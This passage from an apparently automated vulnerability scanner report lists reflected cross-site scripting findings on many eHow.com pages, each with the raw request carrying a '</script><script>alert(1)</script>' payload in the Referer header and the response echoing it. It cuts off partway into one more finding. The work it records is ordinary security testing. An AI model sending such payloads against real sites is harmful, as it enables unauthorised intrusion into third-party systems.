Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d7370</script><script>alert(1)</script>1fdfe884e13

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73379

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Open a Pub File on a Mac | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d7370</script><script>alert(1)</script>1fdfe884e13";

       </script>
...[SNIP]...

4.632. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5073161_convert-wps-file-extension.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de30</script><script>alert(1)</script>08c31b04285 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_5073161_convert-wps-file-extension.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8de30</script><script>alert(1)</script>08c31b04285

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75348

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Convert a WPS File Extension | eHow.com</t
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8de30</script><script>alert(1)</script>08c31b04285";

       </script>
...[SNIP]...

4.633. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5215115_change-startup-programs-windows-7.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 792c3</script><script>alert(1)</script>e4edbcebfeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_5215115_change-startup-programs-windows-7.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=792c3</script><script>alert(1)</script>e4edbcebfeb

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82260

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Change Startup Programs in Windows 7 | eHo
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "792c3</script><script>alert(1)</script>e4edbcebfeb";

       </script>
...[SNIP]...

4.634. http://www.ehow.com/how_5381925_make-roof-rake.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5381925_make-roof-rake.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c9ba</script><script>alert(1)</script>fd2c9cc4bf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_5381925_make-roof-rake.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2c9ba</script><script>alert(1)</script>fd2c9cc4bf2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74669

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Roof Rake | eHow.com</title>
       <me
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "2c9ba</script><script>alert(1)</script>fd2c9cc4bf2";

       </script>
...[SNIP]...

4.635. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5521182_avoid-seasonal-affective-disorder-sad.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42857</script><script>alert(1)</script>6ac0b75544c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_5521182_avoid-seasonal-affective-disorder-sad.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=42857</script><script>alert(1)</script>6ac0b75544c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87570

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Avoid SAD | eHow.com</title>
       <meta char
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "42857</script><script>alert(1)</script>6ac0b75544c";

       </script>
...[SNIP]...

4.636. http://www.ehow.com/how_5809012_create-indoor-gardens.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5809012_create-indoor-gardens.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b70</script><script>alert(1)</script>2db931d6be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_5809012_create-indoor-gardens.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a5b70</script><script>alert(1)</script>2db931d6be2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78162

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Create Indoor Gardens | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "a5b70</script><script>alert(1)</script>2db931d6be2";

       </script>
...[SNIP]...

4.637. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_6469141_improve-english-grammar-skills.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec4a</script><script>alert(1)</script>7e8c02f9d09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_6469141_improve-english-grammar-skills.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=eec4a</script><script>alert(1)</script>7e8c02f9d09

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76462

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Improve English Grammar Skills | eHow.com<
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "eec4a</script><script>alert(1)</script>7e8c02f9d09";

       </script>
...[SNIP]...

4.638. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7496527_resolve-5-common-grammar-problems.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabda</script><script>alert(1)</script>31a3c6ca008 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_7496527_resolve-5-common-grammar-problems.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=aabda</script><script>alert(1)</script>31a3c6ca008

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83005

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Resolve 5 Common Grammar Problems | eHow.c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "aabda</script><script>alert(1)</script>31a3c6ca008";

       </script>
...[SNIP]...

4.639. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7744253_attach-mini-shades-update-chandelier.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21a6</script><script>alert(1)</script>d5f8e9adbce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_7744253_attach-mini-shades-update-chandelier.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c21a6</script><script>alert(1)</script>d5f8e9adbce

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73804

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Attach Mini Shades to Update a Chandelier
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c21a6</script><script>alert(1)</script>d5f8e9adbce";

       </script>
...[SNIP]...

4.640. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7856914_prevent-chimney-fires.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba04d</script><script>alert(1)</script>b64307eba63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_7856914_prevent-chimney-fires.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ba04d</script><script>alert(1)</script>b64307eba63

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72254

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Prevent Chimney Fires | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ba04d</script><script>alert(1)</script>b64307eba63";

       </script>
...[SNIP]...

4.641. http://www.ehow.com/how_9191_program-rca-universal.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_9191_program-rca-universal.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df4eb</script><script>alert(1)</script>912910bc2c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how_9191_program-rca-universal.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=df4eb</script><script>alert(1)</script>912910bc2c4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83616

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Program an RCA Universal Remote Control |
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "df4eb</script><script>alert(1)</script>912910bc2c4";

       </script>
...[SNIP]...

4.642. http://www.ehow.com/internet/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/internet/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c74d1</script><script>alert(1)</script>96f99f29a5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /internet/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c74d1</script><script>alert(1)</script>96f99f29a5c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72741

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Internet - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c74d1</script><script>alert(1)</script>96f99f29a5c";

       </script>
...[SNIP]...

4.643. http://www.ehow.com/job-search-and-employment/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/job-search-and-employment/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa308</script><script>alert(1)</script>c5f09faead2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /job-search-and-employment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=aa308</script><script>alert(1)</script>c5f09faead2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72494

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Job Search & Employment - How To Information | eH
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "aa308</script><script>alert(1)</script>c5f09faead2";

       </script>
...[SNIP]...

4.644. http://www.ehow.com/lawn-and-garden/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/lawn-and-garden/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba46</script><script>alert(1)</script>6b620b72d2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /lawn-and-garden/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=1ba46</script><script>alert(1)</script>6b620b72d2c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71036

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Lawn & Garden - How To Information | eHow.com</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "1ba46</script><script>alert(1)</script>6b620b72d2c";

       </script>
...[SNIP]...

4.645. http://www.ehow.com/legal/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/legal/

Issue detail

